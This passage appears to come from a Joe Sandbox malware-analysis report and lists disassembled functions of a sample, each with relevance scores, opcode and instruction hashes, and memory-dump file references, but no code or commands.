                                          • Instruction ID: 48b692ce5991d418a4ae8b8b099d35f08018c114b4e5dcef7fe5782c5f7a162f
                                          • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                          • Instruction Fuzzy Hash: F931B03170871A4BC754AD69C4C822FFAD2BBD9360F558A3DE589C3385EB718C48C682
                                          Function 004DAB2C Relevance: .0, Instructions: 47COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                          • Instruction ID: f6fb8f7392458d94b55a6c8231ece3d4ba15dd8edd3ebf6a7771166715935065
                                          • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                          • Instruction Fuzzy Hash: 5EF04F73B656290BA360CDB66D01197A2C3A7C0774F1F856AEC44D7642E938DC4786CA
                                          Function 004DAAC0 Relevance: .0, Instructions: 41COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                          • Instruction ID: 7372ec29a01d3e257bde3953bdb21c9ef9e1a5c2a20e0b663c3718fd79ba31af
                                          • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                          • Instruction Fuzzy Hash: FDF08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC96AECA0E7206E930EC0656D5
                                          Function 00409980 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58e9adfc1db39c842bd99b86c29a667cab98aa41c022415067581be5255bb902
                                          • Instruction ID: ad82a1f06fdd0192b633d4ea64cdd70ca6182ee66227c10387f4e395218e028a
                                          • Opcode Fuzzy Hash: 58e9adfc1db39c842bd99b86c29a667cab98aa41c022415067581be5255bb902
                                          • Instruction Fuzzy Hash: 34B012319002014BD706CB38DD7509133B27392300399C4FDD00345055D63DD012C604
                                          Function 00286810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: [
                                          • API String ID: 0-784033777
                                          • Opcode ID: 98ba387379e406195a14df33584fe6e3f2aabf748e0a2fe57e9c994e75c0c7a3
                                          • Instruction ID: 240de72ccbedbe0fbbea5ccd8922e1c79844fdda842dde1cd99f028f938b9d01
                                          • Opcode Fuzzy Hash: 98ba387379e406195a14df33584fe6e3f2aabf748e0a2fe57e9c994e75c0c7a3
                                          • Instruction Fuzzy Hash: D6B1677993A3835BDB39BE20889D73A7AC8EB5530CF18052EE8C5C61C1EB65C8748752
                                          Function 005AB1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID: islower
                                          • String ID: $
                                          • API String ID: 3326879001-3993045852
                                          • Opcode ID: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                          • Instruction ID: 4b38f98ae4afae9158d5d64a51a0b5f96d7ed63b4a543d0829bed2a3b53b41d8
                                          • Opcode Fuzzy Hash: c7bfa1dfb3d16157a530f8e6aae6d2394b6ad0d0820624b4b4e4ec53874544e0
                                          • Instruction Fuzzy Hash: 8061B8706083458BEB149F69C88022FFFE2BFCA314F544E2EE49587392E774D9458792